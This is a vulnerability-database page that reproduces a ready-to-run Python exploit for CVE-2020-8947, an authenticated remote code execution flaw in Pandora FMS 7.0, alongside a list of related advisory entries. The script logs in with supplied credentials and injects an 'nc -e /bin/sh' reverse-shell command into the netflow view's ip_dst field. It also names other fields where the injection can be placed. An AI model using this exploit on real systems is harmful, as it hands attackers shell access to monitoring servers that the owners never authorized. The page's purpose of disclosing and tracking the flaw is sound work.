Vulners
Lucene search
Pandora FMS 7.0 Authenticated Remote Code Execution
🗓️ 13 Feb 2020 00:00:00Reported by Engin DemirbilekType 
packetstorm🔗 packetstormsecurity.com👁 158 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | PANDORAFMS 7.0 - Authenticated Remote Code Execution Exploit | 13 Feb 202000:00 | – | zdt |
 | Artica Pandora FMS Remote Code Execution Vulnerability | 17 Feb 202000:00 | – | cnvd |
 | CVE-2020-8947 | 12 Feb 202017:52 | – | cve |
 | CVE-2020-8947 | 12 Feb 202017:52 | – | cvelist |
 | PANDORAFMS 7.0 - Authenticated Remote Code Execution | 13 Feb 202000:00 | – | exploitdb |
 | PANDORAFMS 7.0 - Authenticated Remote Code Execution | 13 Feb 202000:00 | – | exploitpack |
 | CVE-2020-8947 | 12 Feb 202018:15 | – | nvd |
 | Design/Logic Flaw | 12 Feb 202018:15 | – | prion |
 | CVE-2020-8947 | 22 May 202517:11 | – | redhatcve |
`# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Date: 2020-02-12
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947
#!/bin/python
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4
This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port
Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947
'''
import requests
import sys
if len(sys.argv) < 6:
print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
exit()
url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'
login = {
'nick':user,
'pass':password,
'login_button':'Login'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/pandora_console/index.php?login=1", data=login)
payload = {
'date':"",
'time':"",
'period':"",
'interval_length':"",
'chart_type':"",
'max_aggregates':"1",
'address_resolution':"0",
'name':"",
'assign_group':"0",
'filter_type':"0",
'filter_id':"0",
'filter_selected':"0",
'ip_dst':payload,
'ip_src':"",
'dst_port':"",
'src_port':"",
'advanced_filter':"",
'aggregate':"dstip",
'router_ip':"",
'output':"bytes",
'draw_button':"Draw"
}
print "[+] Sendin exploit ..."
exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'})
if exploit.status_code == 200:
print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
else:
print "[-] Couldn't send the HTTP request, try again."
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Feb 2020 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.16795